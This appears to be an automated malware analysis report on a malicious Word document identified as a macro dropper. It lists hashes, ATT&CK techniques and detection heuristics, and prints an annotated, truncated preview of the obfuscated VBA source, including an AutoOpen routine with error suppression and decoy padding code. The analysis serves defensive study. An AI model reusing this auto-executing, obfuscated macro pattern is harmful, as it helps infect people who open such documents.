Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d84138775153fb6f…

MALICIOUS

Office (OLE)

Size: 160.0 KB · Created: 2018-04-26 19:40:00 · Authoring application: Microsoft Office Word · First seen: 2019-06-27
MD5: 594ce0bd893139cfa9ab930183f12a4f SHA-1: 11374e050ff717f938b609d9587830805ac0b141 SHA-256: d84138775153fb6fdab1dc5c8370f037475e926d87a4a57b7041c92a168f843a
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, including an AutoOpen macro and a Shell() call. ClamAV identifies it as 'Doc.Dropper.Agent-6520158-0', suggesting it acts as a dropper. The VBA code is heavily obfuscated, but the presence of the Shell() call indicates an intent to execute external code, likely a second-stage payload.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6520158-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520158-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro-execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52132 bytes
SHA-256: 17a24c0d3297022b89664ca1f41879e192b048d56e4cbec10d51eb4508ea7f44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sWLpKFSYwjVtsG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Header of the first VBA module in the carved macros.bas. VB_Base =
' "1Normal.ThisDocument" together with VB_PredeclaredId / VB_Exposed = True is
' consistent with a document (ThisDocument-style) class module rather than a
' standard module; the module name itself is a random-looking string. The
' Autoopen entry point further down belongs to this module.
' Sub MINns: the parameter lNZQjH is never read. The body is a single Select
' Case on VQZNNu, which is not assigned anywhere in the visible listing; each
' literal Case arm only stores the result of Round/Hex/CByte/Log into names
' that are never used afterwards. NOTE(review): looks like decoy/padding code
' with no observable effect — no Shell, file or network call appears here.
Sub MINns(lNZQjH)
Select Case VQZNNu
         Case 84311
            fEGTd = wUzhZ
            kzwEl = Round(6960)
            kfSpj = Hex(pTdwkz - ChrW(wthEH))
            OSmtZ = GkGXTU
         Case 54055
            sHfMO = CByte(44016)
            otVYP = Log(WarQrz)
End Select
End Sub
' Sub oiwmt: the parameter dKjvJ is never read. Three consecutive Select Case
' blocks on HmJpNV, OjJit and wiBLP — none of which is assigned in the visible
' listing — each hold two literal Case arms that only assign Round/Hex/CByte/Log
' results to names never used afterwards. NOTE(review): same decoy/padding
' pattern as MINns; nothing here has an observable effect.
Sub oiwmt(dKjvJ)
Select Case HmJpNV
         Case 81377
            vaYRUJ = jKOHcX
            VKJtT = Round(13180)
            OEzLzH = Hex(NkivBN - ChrW(OJjRj))
            tAVoh = wRzjU
         Case 3704
            qhVbFX = CByte(3835)
            WZkMbJ = Log(GAcbjw)
End Select
Select Case OjJit
         Case 21678
            NEKtRX = siathK
            alcGu = Round(12940)
            zDsRm = Hex(TmRbiq - ChrW(IUaSJ))
            BORBhC = cnwhYw
         Case 8745
            OARbf = CByte(63440)
            FRzPq = Log(OGLJwI)
End Select
Select Case wiBLP
         Case 99984
            jokCj = zuUIrd
            jIzCS = Round(23527)
            OjnXbp = Hex(YfwGMf - ChrW(oRhwj))
            tTlCS = DXoiz
         Case 86120
            EwzBM = CByte(52283)
            mYOVCf = Log(lsqSFj)
End Select
End Sub
' Sub BuvkF: the parameter mbkzz is never read. Two Select Case blocks on
' JaUpP and joijO (neither assigned in the visible listing) with literal Case
' arms that only assign Round/Hex/CByte/Log results to names never used again.
' NOTE(review): decoy/padding code; no observable effect in this routine.
Sub BuvkF(mbkzz)
Select Case JaUpP
         Case 40458
            sRVFQ = nURfzQ
            JvDEEQ = Round(12922)
            EKnRW = Hex(VXQCbz - ChrW(qqjpik))
            nUvnh = DOXQl
         Case 98210
            CoHhn = CByte(88973)
            RwBdW = Log(KSFXO)
End Select
Select Case joijO
         Case 1016
            RlHAzR = ijCjzB
            ZBrSSR = Round(27464)
            lJACLS = Hex(YEsjDc - ChrW(JvBLu))
            iQVYMp = mnRvj
         Case 41950
            AwAzF = CByte(17588)
            IwqSw = Log(zrvRH)
End Select
End Sub
' Sub Autoopen: Word's AutoOpen entry point — a routine with this name runs
' automatically when the document is opened (the report's OLE_VBA_AUTOOPEN
' finding). It is the only routine in the visible listing that contains a
' statement doing more than assigning to unused locals.
Sub Autoopen()
' Suppresses every runtime error in the statements that follow, so a failing
' decoy expression (e.g. Log() of a non-positive value) cannot abort the macro
' before the call below is reached.
On Error Resume Next
Select Case iPUnb
         Case 80672
            Mnknw = hFZKvE
            lbVSf = Round(10963)
            hGvsz = Hex(MrHfLY - ChrW(iwVXK))
            UQCajA = AmDuC
         Case 15498
            boFss = CByte(75764)
            lqzuz = Log(zXoFz)
End Select
' The one statement with an observable effect: calls oUlwzfh with the
' sum/concatenation of three names (the space before the parenthesis makes the
' single argument pass by value). Neither oUlwzfh nor kkwfj, IMuivVnnFOB, rmoao
' is defined or assigned in the visible listing. NOTE(review): presumably the
' reported Shell() call is reached through oUlwzfh — confirm against the full
' extracted macros.bas, which this 1,000-line preview truncates.
oUlwzfh (kkwfj + IMuivVnnFOB + rmoao)
' Trailing decoy block, same pattern as the one above the call.
Select Case dDCfu
         Case 82452
            fXnjZE = hiPdzz
            uXldJZ = Round(57686)
            ASLCk = Hex(wTRdz - ChrW(SjzAYb))
            jNWLcq = ifRCl
         Case 32898
            iXUYXT = CByte(30051)
            KwAAVi = Log(akEhZ)
End Select
End Sub
' Sub ndHiLU: the parameter QCOrjc is never read. Three Select Case blocks on
' MccAHk, KlSTi and SQMwIU (none assigned in the visible listing) with literal
' Case arms that only assign Round/Hex/CByte/Log results to names never used
' again. NOTE(review): decoy/padding code; no observable effect in this routine.
Sub ndHiLU(QCOrjc)
Select Case MccAHk
         Case 90787
            YLcUm = FjzDr
            qtMqL = Round(98599)
            VIjIUt = Hex(wzIDZp - ChrW(lFwGr))
            KKWRop = zTQmpI
         Case 5434
            uoCHav = CByte(48022)
            YtdBA = Log(nPjUR)
End Select
Select Case KlSTi
         Case 37078
            ihWORn = qRtwQm
            CzXKna = Round(85292)
            ACUrjP = Hex(VjdHD - ChrW(aCiMOX))
            WWkEi = HovIrt
         Case 375
            hTtaGM = CByte(65453)
            KVIirc = Log(swZCdI)
End Select
Select Case SQMwIU
         Case 50447
            lODutj = lHLjbL
            vvsis = Round(5257)
            RqWrD = Hex(dNKEN - ChrW(kjtfz))
            MHMRqz = SDVQDd
         Case 54537
            QUXjD = CByte(80358)
            HYzHTG = Log(iBQuvf)
End Select
End Sub
' Sub zzzZJk: the parameter HwGalz is never read. A single Select Case on PWzut
' (not assigned in the visible listing) whose literal Case arms only assign
' Round/Hex/CByte/Log results to names never used again. NOTE(review):
' decoy/padding code; no observable effect in this routine.
Sub zzzZJk(HwGalz)
Select Case PWzut
         Case 57910
            oUjdbr = UAIhw
            TUYHtF = Round(72228)
            bqjiI = Hex(PfRAB - ChrW(vIfPv))
            sYnwzs = VAuzrA
         Case 77938
            zMdDvS = CByte(70754)
            ojIjv = Log(KpILKM)
End Select
End Sub

Attribute VB_Name = "MfsntmFVh"
' Header of a second VBA module carved into the same macros.bas; its routines
' follow below and are cut off by the 1,000-line preview limit.
Sub zNIvw(MzQIP)
Select Case MpMtoq
         Case 8894
            jqcfnj = QBjinH
            ITmkO = Round(77957)
            LuEwNT = Hex(aAwPQ - ChrW(tJkdIP))
            vzkdb = ChtGDc
         Case 
... (truncated)